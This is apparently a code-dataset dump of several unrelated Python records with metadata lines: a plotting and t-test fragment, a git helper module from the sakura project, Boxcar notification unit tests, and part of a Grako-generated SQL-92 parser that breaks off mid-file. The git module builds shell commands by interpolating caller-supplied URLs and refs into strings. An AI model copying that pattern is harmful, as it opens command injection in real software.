data.loc[t, 'STF Baseline'] = data.loc[t, 'Succesfully Tracked Features 1']
data.loc[t, 'STF Experiment'] = data.loc[t, 'Succesfully Tracked Features 0']
pvalue, stats1, stats2 = ttost_paired(data['STF Experiment'], data['STF Baseline'], 0, 10000)
print pvalue
print stats1
print stats2
plt.scatter(data.index, data['STF Baseline'], label='baseline')
plt.scatter(data.index, data['STF Experiment'], color="green", label='experiment')
plt.legend(loc='upper right')
plt.draw()
dataMax = max(data['STF Baseline'].max(), data['STF Experiment'].max())
bins = np.linspace(0, dataMax)
plt.figure()
plt.hist(data['STF Baseline'], alpha = 0.5, bins=bins, label="baseline")
plt.hist(data['STF Experiment'], alpha = 0.5, bins=bins, label="experiment")
plt.legend(loc='upper right')
plt.draw()
plt.figure()
plt.hist(data['STF Experiment'] - data['STF Baseline'], bins=30, color="red")
plt.xlabel('Experiment - Baseline')
plt.show()
|
mit
| 3,732,625,034,884,263,400
| 31.428571
| 93
| 0.693098
| false
| 2.935345
| false
| false
| false
|
eduble/panteda
|
sakura/daemon/code/git.py
|
1
|
4338
|
from pathlib import Path
from sakura.common.tools import yield_operator_subdirs, run_cmd
from sakura.common.errors import APIRequestError
GIT_CLONE_TIMEOUT = 60.0 # seconds
GIT_LS_REMOTE_TIMEOUT = 5.0 # seconds
def fetch_updates(code_dir, code_ref):
if code_ref.startswith('branch:'):
remote_ref = code_ref[7:]
elif code_ref.startswith('tag:'):
remote_ref = 'refs/tags/' + code_ref[4:]
try:
run_cmd('git fetch origin %(remote_ref)s' % dict(
remote_ref = remote_ref), cwd=code_dir)
except:
raise APIRequestError('Fetching code failed. Verify given branch or tag.')
def get_worktree(code_workdir, repo_url, code_ref, commit_hash):
code_workdir = Path(code_workdir)
code_workdir.mkdir(parents=True, exist_ok=True)
code_workdir = code_workdir.resolve()
repo_url_path = repo_url.replace('//', '/').replace(':', '')
code_repodir = code_workdir / 'repos' / repo_url_path
# clone if needed
if not code_repodir.exists():
code_repodir.parent.mkdir(parents=True, exist_ok=True)
try:
run_cmd('git clone --no-checkout %(url)s %(dest)s' % dict(
url = repo_url,
dest = code_repodir),
timeout = GIT_CLONE_TIMEOUT)
except:
raise APIRequestError('Cloning repository failed. Verify given URL.')
# get worktree if needed
worktree_dir = code_workdir / 'worktrees' / repo_url_path / commit_hash
if not worktree_dir.exists():
# ensure our local clone knows this commit
fetch_updates(code_repodir, code_ref)
# create the worktree dir
worktree_dir.parent.mkdir(parents=True, exist_ok=True)
try:
run_cmd('git worktree add %(wtdir)s %(commit_hash)s' % dict(
wtdir = worktree_dir,
commit_hash = commit_hash), cwd=code_repodir)
except:
raise APIRequestError('Could not checkout code. Verify given commit hash.')
return worktree_dir
def get_commit_metadata(worktree_dir, commit_hash=None):
cmd = "git log -1 --format='%H%n%at%n%ct%n%ae%n%s'"
if commit_hash != None:
cmd += ' ' + commit_hash
try:
info_lines = run_cmd(cmd, cwd=worktree_dir).splitlines()
except:
raise APIRequestError('Could not find given commit hash.')
commit_hash, s_author_date, s_committer_date, author_email, commit_subject = info_lines
return dict(
commit_hash = commit_hash,
author_date = int(s_author_date),
committer_date = int(s_committer_date),
author_email = author_email,
commit_subject = commit_subject
)
def list_code_revisions(repo_url, ref_type = None):
if ref_type is None:
return list_code_revisions(repo_url, 'tag') + list_code_revisions(repo_url, 'branch')
if ref_type == 'tag':
opt = '--tags'
rev_tags = ()
else: # branches
opt = '--heads'
rev_tags = ('HEAD',)
try:
info = run_cmd("git ls-remote %(opt)s %(url)s" % \
dict(opt = opt, url = repo_url), timeout = GIT_LS_REMOTE_TIMEOUT)
except:
raise APIRequestError('Querying repository failed. Verify given URL.')
words = info.strip().replace('\t', ' ').replace('/', ' ').replace('\n', ' ').split(' ')
commits = words[0::4]
refs = list(ref_type + ':' + w for w in words[3::4])
rev_tags = [ rev_tags ] * len(commits)
return tuple(zip(refs, commits, rev_tags))
def get_last_commit_hash(repo_url, code_ref):
words = code_ref.split(':')
if len(words) != 2 or words[0] not in ('branch', 'tag'):
raise APIRequestError('Invalid code ref.')
short_ref = words[1]
try:
info = run_cmd("git ls-remote %(url)s %(ref)s" % \
dict(url = repo_url, ref = short_ref), timeout = GIT_LS_REMOTE_TIMEOUT)
except:
raise APIRequestError('Querying repository failed. Verify given URL.')
return info.split()[0]
def list_operator_subdirs(code_workdir, repo_url, code_ref):
commit_hash = get_last_commit_hash(repo_url, code_ref)
worktree_dir = get_worktree(code_workdir, repo_url, code_ref, commit_hash)
return sorted(str(op_dir.relative_to(worktree_dir)) \
for op_dir in yield_operator_subdirs(worktree_dir))
|
gpl-3.0
| 5,805,838,144,312,942,000
| 41.116505
| 93
| 0.607653
| false
| 3.464856
| false
| false
| false
|
mrtazz/towbar
|
tests/unit/test_towbar_unit.py
|
1
|
1704
|
# -*- coding: utf-8 -*-
import unittest
import os
import sys
import mock
sys.path.append(os.getcwd())
import towbar
class TestTowbar(unittest.TestCase):
def setUp(self):
self.t = towbar.Towbar("foo", "bar")
def tearDown(self):
pass
@mock.patch('time.time')
@mock.patch('requests.post')
def test_notify_myself_simple(self, mock_requests, mock_time):
mock_time.return_value = 1
data = {'notification[from_screen_name]': 'me',
'notification[message]': 'msg',
'notification[from_remote_service_id]': 1}
self.t.notify_myself("msg", "me")
mock_requests.assert_called_once_with('https://boxcar.io/notifications',
data=data,
auth=("foo", "bar"))
@mock.patch('time.time')
@mock.patch('requests.post')
def test_notify_myself_full(self, mock_requests, mock_time):
mock_time.return_value = 1
data = {'notification[from_screen_name]': 'me',
'notification[message]': 'msg',
'notification[from_remote_service_id]': 1,
"notification[source_url]": "source_url",
"notification[icon_url]": "icon_url",
"notification[sound]": "sound",
"callback": "callback"}
self.t.notify_myself("msg", "me", "source_url", "icon_url", "sound", "callback")
mock_requests.assert_called_once_with('https://boxcar.io/notifications',
data=data,
auth=("foo", "bar"))
if __name__ == '__main__':
unittest.main()
|
mit
| 5,397,757,464,395,163,000
| 34.5
| 88
| 0.524648
| false
| 3.846501
| true
| false
| false
|
vmuriart/sqldef
|
src/parsers/sql1992_grammar.py
|
1
|
124558
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# CAVEAT UTILITOR
#
# This file was automatically generated by Grako.
#
# https://pypi.python.org/pypi/grako/
#
# Any changes you make to it will be overwritten the next time
# the file is generated.
from __future__ import print_function, division, absolute_import, unicode_literals
from grako.parsing import graken, Parser
from grako.util import re, RE_FLAGS, generic_main # noqa
__version__ = (2016, 8, 1, 1, 11, 9, 0)
__all__ = [
'SqlParser',
'SqlSemantics',
'main'
]
KEYWORDS = set([])
class SqlParser(Parser):
def __init__(self,
whitespace='\\s+',
nameguard=None,
comments_re='/\\*[\\s\\S]*?\\*/',
eol_comments_re='--.*?$',
ignorecase=True,
left_recursion=True,
keywords=KEYWORDS,
namechars='',
**kwargs):
super(SqlParser, self).__init__(
whitespace=whitespace,
nameguard=nameguard,
comments_re=comments_re,
eol_comments_re=eol_comments_re,
ignorecase=ignorecase,
left_recursion=left_recursion,
keywords=keywords,
namechars=namechars,
**kwargs
)
@graken()
def _digit_(self):
self._pattern(r'\d+')
@graken()
def _double_quote_(self):
self._token('"')
@graken()
def _quote_(self):
self._token("'")
@graken()
def _left_paren_(self):
self._token('(')
@graken()
def _right_paren_(self):
self._token(')')
@graken()
def _asterisk_(self):
self._token('*')
@graken()
def _plus_sign_(self):
self._token('+')
@graken()
def _comma_(self):
self._token(',')
@graken()
def _minus_sign_(self):
self._token('-')
@graken()
def _period_(self):
self._token('.')
@graken()
def _solidus_(self):
self._token('/')
@graken()
def _colon_(self):
self._token(':')
@graken()
def _semicolon_(self):
self._token(';')
@graken()
def _less_than_operator_(self):
self._token('<')
@graken()
def _equals_operator_(self):
self._token('=')
@graken()
def _greater_than_operator_(self):
self._token('>')
@graken()
def _question_mark_(self):
self._token('?')
@graken()
def _underscore_(self):
self._token('_')
@graken()
def _regular_identifier_(self):
self._pattern(r'[a-z]\w*')
self._check_name()
@graken()
def _delimited_identifier_(self):
self._double_quote_()
self._delimited_identifier_body_()
self._double_quote_()
@graken()
def _delimited_identifier_body_(self):
self._pattern(r'(""|[^"\n])+')
@graken()
def _not_equals_operator_(self):
self._token('<>')
@graken()
def _greater_than_or_equals_operator_(self):
self._token('>=')
@graken()
def _less_than_or_equals_operator_(self):
self._token('<=')
@graken()
def _concatenation_operator_(self):
self._token('||')
@graken()
def _literal_(self):
with self._choice():
with self._option():
self._signed_numeric_literal_()
with self._option():
self._general_literal_()
self._error('no available options')
@graken()
def _unsigned_literal_(self):
with self._choice():
with self._option():
self._unsigned_numeric_literal_()
with self._option():
self._general_literal_()
self._error('no available options')
@graken()
def _general_literal_(self):
with self._choice():
with self._option():
self._character_string_literal_()
with self._option():
self._national_character_string_literal_()
with self._option():
self._bit_string_literal_()
with self._option():
self._hex_string_literal_()
with self._option():
self._datetime_literal_()
with self._option():
self._interval_literal_()
self._error('no available options')
@graken()
def _character_string_literal_(self):
with self._optional():
self._underscore_()
self._character_set_name_()
def block0():
self._quote_()
self._character_representation_()
self._quote_()
self._positive_closure(block0)
@graken()
def _character_representation_(self):
self._pattern(r"(''|[^'\n])*")
@graken()
def _national_character_string_literal_(self):
self._token('N')
def block0():
self._quote_()
self._character_representation_()
self._quote_()
self._positive_closure(block0)
@graken()
def _bit_string_literal_(self):
self._token('B')
def block0():
self._quote_()
with self._optional():
def block1():
self._bit_()
self._positive_closure(block1)
self._quote_()
self._positive_closure(block0)
@graken()
def _hex_string_literal_(self):
self._token('X')
def block0():
self._quote_()
with self._optional():
def block1():
self._hexit_()
self._positive_closure(block1)
self._quote_()
self._positive_closure(block0)
@graken()
def _bit_(self):
self._pattern(r'[01]')
@graken()
def _hexit_(self):
self._pattern(r'[a-f\d]')
@graken()
def _signed_numeric_literal_(self):
with self._optional():
self._sign_()
self._unsigned_numeric_literal_()
@graken()
def _unsigned_numeric_literal_(self):
with self._choice():
with self._option():
self._exact_numeric_literal_()
with self._option():
self._approximate_numeric_literal_()
self._error('no available options')
@graken()
def _exact_numeric_literal_(self):
with self._choice():
with self._option():
self._unsigned_integer_()
with self._optional():
self._period_()
with self._optional():
self._unsigned_integer_()
with self._option():
self._period_()
self._unsigned_integer_()
self._error('no available options')
@graken()
def _sign_(self):
with self._choice():
with self._option():
self._plus_sign_()
with self._option():
self._minus_sign_()
self._error('no available options')
@graken()
def _approximate_numeric_literal_(self):
self._exact_numeric_literal_()
self._token('E')
self._signed_integer_()
@graken()
def _signed_integer_(self):
with self._optional():
self._sign_()
self._unsigned_integer_()
@graken()
def _unsigned_integer_(self):
self._digit_()
@graken()
def _datetime_literal_(self):
with self._choice():
with self._option():
self._date_literal_()
with self._option():
self._time_literal_()
with self._option():
self._timestamp_literal_()
self._error('no available options')
@graken()
def _date_literal_(self):
self._token('DATE')
self._date_string_()
@graken()
def _time_literal_(self):
self._token('TIME')
self._time_string_()
@graken()
def _timestamp_literal_(self):
self._token('TIMESTAMP')
self._timestamp_string_()
@graken()
def _date_string_(self):
self._quote_()
self._date_value_()
self._quote_()
@graken()
def _time_string_(self):
self._quote_()
self._time_value_()
with self._optional():
self._time_zone_interval_()
self._quote_()
@graken()
def _timestamp_string_(self):
self._quote_()
self._date_value_()
self._time_value_()
with self._optional():
self._time_zone_interval_()
self._quote_()
@graken()
def _time_zone_interval_(self):
self._sign_()
self._hours_value_()
self._colon_()
self._minutes_value_()
@graken()
def _date_value_(self):
self._years_value_()
self._minus_sign_()
self._months_value_()
self._minus_sign_()
self._days_value_()
@graken()
def _time_value_(self):
self._hours_value_()
self._colon_()
self._minutes_value_()
self._colon_()
self._seconds_value_()
@graken()
def _interval_literal_(self):
self._token('INTERVAL')
with self._optional():
self._sign_()
self._interval_string_()
self._interval_qualifier_()
@graken()
def _interval_string_(self):
self._quote_()
with self._group():
with self._choice():
with self._option():
self._year_month_literal_()
with self._option():
self._day_time_literal_()
self._error('no available options')
self._quote_()
@graken()
def _year_month_literal_(self):
with self._choice():
with self._option():
self._years_value_()
with self._option():
with self._optional():
self._years_value_()
self._minus_sign_()
self._months_value_()
self._error('no available options')
@graken()
def _day_time_literal_(self):
with self._choice():
with self._option():
self._day_time_interval_()
with self._option():
self._time_interval_()
self._error('no available options')
@graken()
def _day_time_interval_(self):
self._days_value_()
with self._optional():
self._hours_value_()
with self._optional():
self._colon_()
self._minutes_value_()
with self._optional():
self._colon_()
self._seconds_value_()
@graken()
def _time_interval_(self):
with self._choice():
with self._option():
self._hours_value_()
with self._optional():
self._colon_()
self._minutes_value_()
with self._optional():
self._colon_()
self._seconds_value_()
with self._option():
self._minutes_value_()
with self._optional():
self._colon_()
self._seconds_value_()
with self._option():
self._seconds_value_()
self._error('no available options')
@graken()
def _years_value_(self):
self._datetime_value_()
@graken()
def _months_value_(self):
self._datetime_value_()
@graken()
def _days_value_(self):
self._datetime_value_()
@graken()
def _hours_value_(self):
self._datetime_value_()
@graken()
def _minutes_value_(self):
self._datetime_value_()
@graken()
def _seconds_value_(self):
self._unsigned_integer_()
with self._optional():
self._period_()
with self._optional():
self._unsigned_integer_()
@graken()
def _datetime_value_(self):
self._unsigned_integer_()
@graken()
def _identifier_(self):
with self._optional():
self._underscore_()
self._character_set_name_()
self._actual_identifier_()
@graken()
def _identifier_list_(self):
def sep0():
self._token(',')
def block0():
self._identifier_()
self._positive_closure(block0, prefix=sep0)
@graken()
def _actual_identifier_(self):
with self._choice():
with self._option():
self._regular_identifier_()
with self._option():
self._delimited_identifier_()
self._error('no available options')
@graken()
def _table_name_(self):
with self._choice():
with self._option():
self._schema_qualified_name_()
with self._option():
self._qualified_local_table_name_()
self._error('no available options')
@graken()
def _qualified_local_table_name_(self):
self._token('MODULE')
self._period_()
self._identifier_()
@graken()
def _schema_name_(self):
with self._optional():
self._identifier_()
self._period_()
self._identifier_()
@graken()
def _schema_qualified_name_(self):
with self._optional():
self._schema_name_()
self._period_()
self._identifier_()
@graken()
def _parameter_name_(self):
self._colon_()
self._identifier_()
@graken()
def _character_set_name_(self):
with self._optional():
self._schema_name_()
self._period_()
self._regular_identifier_()
@graken()
def _connection_name_(self):
self._simple_value_specification_()
@graken()
def _data_type_(self):
with self._choice():
with self._option():
self._character_string_type_()
with self._optional():
self._token('CHARACTER')
self._token('SET')
self._character_set_name_()
with self._option():
self._national_character_string_type_()
with self._option():
self._bit_string_type_()
with self._option():
self._numeric_type_()
with self._option():
self._datetime_type_()
with self._option():
self._interval_type_()
self._error('no available options')
@graken()
def _character_string_type_(self):
with self._choice():
with self._option():
self._token('CHARACTER')
with self._optional():
self._left_paren_()
self._length_()
self._right_paren_()
with self._option():
self._token('CHAR')
with self._optional():
self._left_paren_()
self._length_()
self._right_paren_()
with self._option():
self._token('CHARACTER')
self._token('VARYING')
self._left_paren_()
self._length_()
self._right_paren_()
with self._option():
self._token('CHAR')
self._token('VARYING')
self._left_paren_()
self._length_()
self._right_paren_()
with self._option():
self._token('VARCHAR')
self._left_paren_()
self._length_()
self._right_paren_()
self._error('expecting one of: CHAR CHARACTER')
@graken()
def _national_character_string_type_(self):
with self._choice():
with self._option():
self._token('NATIONAL')
self._token('CHARACTER')
with self._optional():
self._left_paren_()
self._length_()
self._right_paren_()
with self._option():
self._token('NATIONAL')
self._token('CHAR')
with self._optional():
self._left_paren_()
self._length_()
self._right_paren_()
with self._option():
self._token('NCHAR')
with self._optional():
self._left_paren_()
self._length_()
self._right_paren_()
with self._option():
self._token('NATIONAL')
self._token('CHARACTER')
self._token('VARYING')
self._left_paren_()
self._length_()
self._right_paren_()
with self._option():
self._token('NATIONAL')
self._token('CHAR')
self._token('VARYING')
self._left_paren_()
self._length_()
self._right_paren_()
with self._option():
self._token('NCHAR')
self._token('VARYING')
self._left_paren_()
self._length_()
self._right_paren_()
self._error('expecting one of: NATIONAL NCHAR')
@graken()
def _bit_string_type_(self):
with self._choice():
with self._option():
self._token('BIT')
with self._optional():
self._left_paren_()
self._length_()
self._right_paren_()
with self._option():
self._token('BIT')
self._token('VARYING')
self._left_paren_()
self._length_()
self._right_paren_()
self._error('expecting one of: BIT')
@graken()
def _numeric_type_(self):
with self._choice():
with self._option():
self._exact_numeric_type_()
with self._option():
self._approximate_numeric_type_()
self._error('no available options')
@graken()
def _exact_numeric_type_(self):
with self._choice():
with self._option():
self._token('NUMERIC')
with self._optional():
self._left_paren_()
self._precision_()
with self._optional():
self._comma_()
self._scale_()
self._right_paren_()
with self._option():
self._token('DECIMAL')
with self._optional():
self._left_paren_()
self._precision_()
with self._optional():
self._comma_()
self._scale_()
self._right_paren_()
with self._option():
self._token('DEC')
with self._optional():
self._left_paren_()
self._precision_()
with self._optional():
self._comma_()
self._scale_()
self._right_paren_()
with self._option():
self._token('INTEGER')
with self._option():
self._token('INT')
with self._option():
self._token('SMALLINT')
self._error('expecting one of: DEC DECIMAL INT INTEGER NUMERIC SMALLINT')
@graken()
def _approximate_numeric_type_(self):
with self._choice():
with self._option():
self._token('FLOAT')
with self._optional():
self._left_paren_()
self._precision_()
self._right_paren_()
with self._option():
self._token('REAL')
with self._option():
self._token('DOUBLE')
self._token('PRECISION')
self._error('expecting one of: DOUBLE FLOAT REAL')
@graken()
def _length_(self):
self._unsigned_integer_()
@graken()
def _precision_(self):
self._unsigned_integer_()
@graken()
def _scale_(self):
self._unsigned_integer_()
@graken()
def _datetime_type_(self):
with self._choice():
with self._option():
self._token('DATE')
with self._option():
self._token('TIME')
with self._optional():
self._left_paren_()
self._precision_()
self._right_paren_()
with self._optional():
self._token('WITH')
self._token('TIME')
self._token('ZONE')
with self._option():
self._token('TIMESTAMP')
with self._optional():
self._left_paren_()
self._precision_()
self._right_paren_()
with self._optional():
self._token('WITH')
self._token('TIME')
self._token('ZONE')
self._error('expecting one of: DATE TIME TIMESTAMP')
@graken()
def _interval_type_(self):
self._token('INTERVAL')
self._interval_qualifier_()
@graken()
def _value_specification_(self):
with self._choice():
with self._option():
self._literal_()
with self._option():
self._general_value_specification_()
self._error('no available options')
@graken()
def _unsigned_value_specification_(self):
with self._choice():
with self._option():
self._unsigned_literal_()
with self._option():
self._general_value_specification_()
self._error('no available options')
@graken()
def _general_value_specification_(self):
with self._choice():
with self._option():
self._parameter_specification_()
with self._option():
self._question_mark_()
with self._option():
self._token('USER')
with self._option():
self._token('CURRENT_USER')
with self._option():
self._token('SESSION_USER')
with self._option():
self._token('SYSTEM_USER')
with self._option():
self._token('VALUE')
self._error('expecting one of: CURRENT_USER SESSION_USER SYSTEM_USER USER VALUE')
@graken()
def _simple_value_specification_(self):
with self._choice():
with self._option():
self._parameter_name_()
with self._option():
self._literal_()
self._error('no available options')
@graken()
def _parameter_specification_(self):
self._parameter_name_()
with self._optional():
self._indicator_parameter_()
@graken()
def _indicator_parameter_(self):
with self._optional():
self._token('INDICATOR')
self._parameter_name_()
@graken()
def _table_reference_(self):
with self._choice():
with self._option():
self._table_name_()
with self._optional():
self._as_clause_()
with self._optional():
self._left_paren_()
self._column_name_list_()
self._right_paren_()
with self._option():
self._subquery_()
self._as_clause_()
with self._optional():
self._left_paren_()
self._column_name_list_()
self._right_paren_()
with self._option():
self._joined_table_()
self._error('no available options')
@graken()
def _column_name_list_(self):
self._identifier_list_()
@graken()
def _column_reference_(self):
with self._optional():
self._qualifier_()
self._period_()
self._identifier_()
@graken()
def _qualifier_(self):
with self._choice():
with self._option():
self._table_name_()
with self._option():
self._identifier_()
self._error('no available options')
@graken()
def _set_function_specification_(self):
with self._choice():
with self._option():
self._token('COUNT')
self._left_paren_()
self._asterisk_()
self._right_paren_()
with self._option():
self._general_set_function_()
self._error('no available options')
@graken()
def _general_set_function_(self):
self._set_function_type_()
self._left_paren_()
with self._optional():
self._set_quantifier_()
self._value_expression_()
self._right_paren_()
@graken()
def _set_function_type_(self):
with self._choice():
with self._option():
self._token('AVG')
with self._option():
self._token('MAX')
with self._option():
self._token('MIN')
with self._option():
self._token('SUM')
with self._option():
self._token('COUNT')
self._error('expecting one of: AVG COUNT MAX MIN SUM')
@graken()
def _set_quantifier_(self):
with self._choice():
with self._option():
self._token('DISTINCT')
with self._option():
self._token('ALL')
self._error('expecting one of: ALL DISTINCT')
@graken()
def _numeric_value_function_(self):
with self._choice():
with self._option():
self._position_expression_()
with self._option():
self._extract_expression_()
with self._option():
self._length_expression_()
self._error('no available options')
@graken()
def _position_expression_(self):
self._token('POSITION')
self._left_paren_()
self._character_value_expression_()
self._token('IN')
self._character_value_expression_()
self._right_paren_()
@graken()
def _length_expression_(self):
with self._choice():
with self._option():
self._char_length_expression_()
with self._option():
self._octet_length_expression_()
with self._option():
self._bit_length_expression_()
self._error('no available options')
@graken()
def _char_length_expression_(self):
with self._group():
with self._choice():
with self._option():
self._token('CHAR_LENGTH')
with self._option():
self._token('CHARACTER_LENGTH')
self._error('expecting one of: CHARACTER_LENGTH CHAR_LENGTH')
self._left_paren_()
self._string_value_expression_()
self._right_paren_()
@graken()
def _octet_length_expression_(self):
self._token('OCTET_LENGTH')
self._left_paren_()
self._string_value_expression_()
self._right_paren_()
@graken()
def _bit_length_expression_(self):
self._token('BIT_LENGTH')
self._left_paren_()
self._string_value_expression_()
self._right_paren_()
@graken()
def _extract_expression_(self):
self._token('EXTRACT')
self._left_paren_()
self._extract_field_()
self._token('FROM')
self._extract_source_()
self._right_paren_()
@graken()
def _extract_field_(self):
with self._choice():
with self._option():
self._datetime_field_()
with self._option():
self._time_zone_field_()
self._error('no available options')
@graken()
def _time_zone_field_(self):
with self._choice():
with self._option():
self._token('TIMEZONE_HOUR')
with self._option():
self._token('TIMEZONE_MINUTE')
self._error('expecting one of: TIMEZONE_HOUR TIMEZONE_MINUTE')
@graken()
def _extract_source_(self):
with self._choice():
with self._option():
self._datetime_value_expression_()
with self._option():
self._interval_value_expression_()
self._error('no available options')
@graken()
def _string_value_function_(self):
with self._choice():
with self._option():
self._character_value_function_()
with self._option():
self._bit_substring_function_()
self._error('no available options')
@graken()
def _character_value_function_(self):
with self._choice():
with self._option():
self._character_substring_function_()
with self._option():
self._fold_()
with self._option():
self._form_of_use_conversion_()
with self._option():
self._character_translation_()
with self._option():
self._trim_function_()
self._error('no available options')
@graken()
def _character_substring_function_(self):
self._token('SUBSTRING')
self._left_paren_()
self._character_value_expression_()
self._token('FROM')
self._start_position_()
with self._optional():
self._token('FOR')
self._string_length_()
self._right_paren_()
@graken()
def _fold_(self):
with self._group():
with self._choice():
with self._option():
self._token('UPPER')
with self._option():
self._token('LOWER')
self._error('expecting one of: LOWER UPPER')
self._left_paren_()
self._character_value_expression_()
self._right_paren_()
@graken()
def _form_of_use_conversion_(self):
self._token('CONVERT')
self._left_paren_()
self._character_value_expression_()
self._token('USING')
self._schema_qualified_name_()
self._right_paren_()
@graken()
def _character_translation_(self):
self._token('TRANSLATE')
self._left_paren_()
self._character_value_expression_()
self._token('USING')
self._schema_qualified_name_()
self._right_paren_()
@graken()
def _trim_function_(self):
self._token('TRIM')
self._left_paren_()
self._trim_operands_()
self._right_paren_()
@graken()
def _trim_operands_(self):
with self._optional():
with self._optional():
self._trim_specification_()
with self._optional():
self._character_value_expression_()
self._token('FROM')
self._character_value_expression_()
@graken()
def _trim_specification_(self):
with self._choice():
with self._option():
self._token('LEADING')
with self._option():
self._token('TRAILING')
with self._option():
self._token('BOTH')
self._error('expecting one of: BOTH LEADING TRAILING')
@graken()
def _bit_substring_function_(self):
self._token('SUBSTRING')
self._left_paren_()
self._bit_value_expression_()
self._token('FROM')
self._start_position_()
with self._optional():
self._token('FOR')
self._string_length_()
self._right_paren_()
@graken()
def _start_position_(self):
self._numeric_value_expression_()
@graken()
def _string_length_(self):
self._numeric_value_expression_()
@graken()
def _datetime_value_function_(self):
with self._choice():
with self._option():
self._token('CURRENT_DATE')
with self._option():
self._current_time_value_function_()
with self._option():
self._current_timestamp_value_function_()
self._error('expecting one of: CURRENT_DATE')
@graken()
def _current_time_value_function_(self):
self._token('CURRENT_TIME')
with self._optional():
self._left_paren_()
self._precision_()
self._right_paren_()
@graken()
def _current_timestamp_value_function_(self):
self._token('CURRENT_TIMESTAMP')
with self._optional():
self._left_paren_()
self._precision_()
self._right_paren_()
@graken()
def _case_expression_(self):
with self._choice():
with self._option():
self._case_abbreviation_()
with self._option():
self._case_specification_()
self._error('no available options')
@graken()
def _case_abbreviation_(self):
with self._choice():
with self._option():
self._token('NULLIF')
self._left_paren_()
self._value_expression_()
self._comma_()
self._value_expression_()
self._right_paren_()
with self._option():
self._token('COALESCE')
self._left_paren_()
self._value_expression_()
def block0():
self._comma_()
self._value_expression_()
self._positive_closure(block0)
self._right_paren_()
self._error('no available options')
@graken()
def _case_specification_(self):
with self._choice():
with self._option():
self._simple_case_()
with self._option():
self._searched_case_()
self._error('no available options')
@graken()
def _simple_case_(self):
self._token('CASE')
self._value_expression_()
def block0():
self._simple_when_clause_()
self._positive_closure(block0)
with self._optional():
self._else_clause_()
self._token('END')
@graken()
def _searched_case_(self):
self._token('CASE')
def block0():
self._searched_when_clause_()
self._positive_closure(block0)
with self._optional():
self._else_clause_()
self._token('END')
@graken()
def _simple_when_clause_(self):
self._token('WHEN')
self._value_expression_()
self._token('THEN')
self._result_()
@graken()
def _searched_when_clause_(self):
self._token('WHEN')
self._search_condition_()
self._token('THEN')
self._result_()
@graken()
def _else_clause_(self):
self._token('ELSE')
self._result_()
@graken()
def _result_(self):
with self._choice():
with self._option():
self._value_expression_()
with self._option():
self._token('NULL')
self._error('expecting one of: NULL')
@graken()
def _cast_specification_(self):
self._token('CAST')
self._left_paren_()
self._cast_operand_()
self._token('AS')
self._cast_target_()
self._right_paren_()
@graken()
def _cast_operand_(self):
with self._choice():
with self._option():
self._value_expression_()
with self._option():
self._token('NULL')
self._error('expecting one of: NULL')
@graken()
def _cast_target_(self):
with self._choice():
with self._option():
self._schema_qualified_name_()
with self._option():
self._data_type_()
self._error('no available options')
@graken()
def _value_expression_(self):
with self._choice():
with self._option():
self._numeric_value_expression_()
with self._option():
self._string_value_expression_()
with self._option():
self._datetime_value_expression_()
with self._option():
self._interval_value_expression_()
self._error('no available options')
@graken()
def _value_expression_primary_(self):
with self._choice():
with self._option():
self._unsigned_value_specification_()
with self._option():
self._column_reference_()
with self._option():
self._set_function_specification_()
with self._option():
self._subquery_()
with self._option():
self._case_expression_()
with self._option():
self._left_paren_()
self._value_expression_()
self._right_paren_()
with self._option():
self._cast_specification_()
self._error('no available options')
@graken()
def _numeric_value_expression_(self):
with self._choice():
with self._option():
self._term_()
with self._option():
self._numeric_value_expression_()
self._plus_sign_()
self._term_()
with self._option():
self._numeric_value_expression_()
self._minus_sign_()
self._term_()
self._error('no available options')
@graken()
def _term_(self):
with self._choice():
with self._option():
self._factor_()
with self._option():
self._term_()
self._asterisk_()
self._factor_()
with self._option():
self._term_()
self._solidus_()
self._factor_()
self._error('no available options')
@graken()
def _factor_(self):
with self._optional():
self._sign_()
self._numeric_primary_()
@graken()
def _numeric_primary_(self):
with self._choice():
with self._option():
self._value_expression_primary_()
with self._option():
self._numeric_value_function_()
self._error('no available options')
@graken()
def _string_value_expression_(self):
with self._choice():
with self._option():
self._character_value_expression_()
with self._option():
self._bit_value_expression_()
self._error('no available options')
@graken()
def _character_value_expression_(self):
with self._choice():
with self._option():
self._concatenation_()
with self._option():
self._character_factor_()
self._error('no available options')
@graken()
def _concatenation_(self):
self._character_value_expression_()
self._concatenation_operator_()
self._character_factor_()
@graken()
def _character_factor_(self):
self._character_primary_()
with self._optional():
self._collate_clause_()
@graken()
def _character_primary_(self):
with self._choice():
with self._option():
self._value_expression_primary_()
with self._option():
self._string_value_function_()
self._error('no available options')
@graken()
def _bit_value_expression_(self):
with self._choice():
with self._option():
self._bit_concatenation_()
with self._option():
self._bit_factor_()
self._error('no available options')
@graken()
def _bit_concatenation_(self):
self._bit_value_expression_()
self._concatenation_operator_()
self._bit_factor_()
@graken()
def _bit_factor_(self):
self._bit_primary_()
@graken()
def _bit_primary_(self):
with self._choice():
with self._option():
self._value_expression_primary_()
with self._option():
self._string_value_function_()
self._error('no available options')
@graken()
def _datetime_value_expression_(self):
with self._choice():
with self._option():
self._datetime_term_()
with self._option():
self._interval_value_expression_()
self._plus_sign_()
self._datetime_term_()
with self._option():
self._datetime_value_expression_()
self._plus_sign_()
self._interval_term_()
with self._option():
self._datetime_value_expression_()
self._minus_sign_()
self._interval_term_()
self._error('no available options')
@graken()
def _datetime_term_(self):
self._datetime_factor_()
@graken()
def _datetime_factor_(self):
self._datetime_primary_()
with self._optional():
self._time_zone_()
@graken()
def _datetime_primary_(self):
with self._choice():
with self._option():
self._value_expression_primary_()
with self._option():
self._datetime_value_function_()
self._error('no available options')
@graken()
def _time_zone_(self):
self._token('AT')
self._time_zone_specifier_()
@graken()
def _time_zone_specifier_(self):
with self._choice():
with self._option():
self._token('LOCAL')
with self._option():
self._token('TIME')
self._token('ZONE')
self._interval_value_expression_()
self._error('expecting one of: LOCAL')
@graken()
def _interval_value_expression_(self):
with self._choice():
with self._option():
self._interval_term_()
with self._option():
self._interval_value_expression_1_()
self._plus_sign_()
self._interval_term_1_()
with self._option():
self._interval_value_expression_1_()
self._minus_sign_()
self._interval_term_1_()
with self._option():
self._left_paren_()
self._datetime_value_expression_()
self._minus_sign_()
self._datetime_term_()
self._right_paren_()
self._interval_qualifier_()
self._error('no available options')
@graken()
def _interval_term_(self):
with self._choice():
with self._option():
self._interval_factor_()
with self._option():
self._interval_term_2_()
self._asterisk_()
self._factor_()
with self._option():
self._interval_term_2_()
self._solidus_()
self._factor_()
with self._option():
self._term_()
self._asterisk_()
self._interval_factor_()
self._error('no available options')
@graken()
def _interval_factor_(self):
with self._optional():
self._sign_()
self._interval_primary_()
@graken()
